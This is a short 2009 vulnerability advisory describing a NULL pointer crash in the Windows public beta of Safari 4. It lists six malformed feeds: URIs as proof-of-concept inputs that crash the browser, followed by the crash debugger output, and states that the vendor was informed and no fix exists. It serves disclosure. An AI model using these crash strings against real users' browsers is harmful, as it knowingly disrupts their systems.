Date: Feb 25 2009
Class: Input Validation Error
Local: Yes
Remote: Yes
Vulnerable Versions:
- Apple Safari 4 (528.16) - Public Beta - Windows version.
Note: MacOS X version are not affected.
Description:
Apple Safari is prone to a denial-of-service vulnerability, caused by a NULL pointer defernce bug, because it fails to adequately sanitize user-supplied input within a
feeds: URI.
Attackers can exploit this issue to cause denial-of-service conditions on a users computer and crash the Safari process.
Proof-of-Concept:
feeds:%&www.rec-sec.com/feed/ DoS
feeds:{&www.rec-sec.com/feed/ DoS
feeds:}&www.rec-sec.com/feed/ DoS
feeds:^&www.rec-sec.com/feed/ DoS
feeds:`&www.rec-sec.com/feed/ DoS
feeds:|&www.rec-sec.com/feed/ DoS
Any feeds:
URI containing one of these characters will cause a denial-of-service condition.
Debugger output:
Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000
ebx=00000000
ecx=00000000
edx=0200078c
esi=05adccd8
edi=01fa2e58
eip=60029915
esp=035af304
ebp=035af32c
iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
PubSubDLL!PSDLL_SetPreferencesDomain+0x284d5:
60029915 ff7050 push dword ptr [eax+50h] ds:0023:00000050=????????
Disclosure:
Vendor has been informed.
Solution:
No solution.
Credit: Trancer